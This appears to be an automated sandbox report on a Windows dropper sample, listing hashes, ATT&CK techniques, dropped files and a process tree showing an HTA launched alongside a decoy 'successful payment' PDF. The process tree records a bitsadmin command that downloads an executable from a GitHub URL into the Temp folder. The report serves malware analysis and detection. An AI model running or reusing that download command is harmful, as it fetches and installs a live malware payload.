9a97ef498ea1fcbe247efd79e293fcadb8b523c334762dcec53d8fb178e7c807

General

Target

SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe
Size

100KB
MD5

05a3652e22ffa7e85b65473182acb707
SHA1

24e4c3464f0c4a3ebf46bd0e8d0a39bd2e9f0a55
SHA256

9a97ef498ea1fcbe247efd79e293fcadb8b523c334762dcec53d8fb178e7c807
SHA512

dd7f6c0d0f8ef063bc67bf08140975b02623e484e492bd93062cc0327ebce9d6d6d6dd7b654ac6e768a3cdd0ef5463674434064c0db8578fd0ab0702e226c4e2
SSDEEP

3072:Ku8cDKY2SgVmoXU/F+Vy54GCfcljji03L:K/DVSqE/FYgs6

Score

8^/10

discovery dropper

Malware Config

Signatures

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
1976	bitsadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1560	AcroRd32.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1560	AcroRd32.exe
1560	AcroRd32.exe
1560	AcroRd32.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 1936	2368	SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe	30
PID 2368 wrote to memory of 1936	2368	SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe	30
PID 2368 wrote to memory of 1936	2368	SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe	30
PID 2368 wrote to memory of 1936	2368	SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe	30
PID 2368 wrote to memory of 1560	2368	SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe	31
PID 2368 wrote to memory of 1560	2368	SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe	31
PID 2368 wrote to memory of 1560	2368	SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe	31
PID 2368 wrote to memory of 1560	2368	SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe	31
PID 1936 wrote to memory of 1976	1936	mshta.exe	32
PID 1936 wrote to memory of 1976	1936	mshta.exe	32
PID 1936 wrote to memory of 1976	1936	mshta.exe	32
PID 1936 wrote to memory of 1976	1936	mshta.exe	32

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.MulDrop23.34226.30868.14577.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\successfulpayment.hta"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1936
- - C:\Windows\SysWOW64\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/system.exe C:\Users\Admin\AppData\Local\Temp\system.exe
    3⤵
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery
    PID:1976
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\successfulpayment.pdf"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:1560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

1

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
9ec5722f5c211aa092627523eededaee

SHA1
acce645d722eb5ca3357abe6f21982fc9d0a7d01

SHA256
1c2bc9d43cb50547bea4b7b22f8491ee131fe995ced4fff7dc096535a499de7a

SHA512
e1604b7c32fa6ff8014096c137f57f27feebd5bc45fbba0128d71346eb3f739397993c4ee4f0b5d9fe9e5be80283218f00a801ccd366fdac0082704eccc9c2d9

Download Submit
C:\Users\Admin\AppData\Roaming\successfulpayment.hta

Filesize
884B

MD5
168db1ea9ff342afc28adab5c01bd159

SHA1
063357780b0e0a82f36670ce59be818c1eb75012

SHA256
1c3a2840f2d8d1730a52f2498c58e86fb6a70199d347cb57e300bb2110ef85e6

SHA512
93e87e9f1ef123dc6e476933e08d6d94917c05ef2355eb2f0e75bf6cd832e26a4386742bd66cd7a89c07d832f60f3fba90522cefe92909c03627688c0e5b4cf0

Download Submit
C:\Users\Admin\AppData\Roaming\successfulpayment.pdf

Filesize
89KB

MD5
609c3fe620acd93745b01a2115dfb2ea

SHA1
8552ce163f5bdd8e729091416f961d2e3cff53d1

SHA256
be1c0ba85aa8a85432f3e8764517a8aec6e34dcbc807f6f122b9f2895ba2b850

SHA512
96b9ab8f4fd84980b75760279273d815b7ec16b9ef6a0582c5bb539f3a58a6430f5208089203f341755b0821f3c29144f509b5f285e97bd1af4d9dc9361de344

Download Submit
memory/2368-0-0x000007FEF5653000-0x000007FEF5654000-memory.dmp

Filesize
4KB

Download
memory/2368-1-0x0000000000E90000-0x0000000000EB0000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads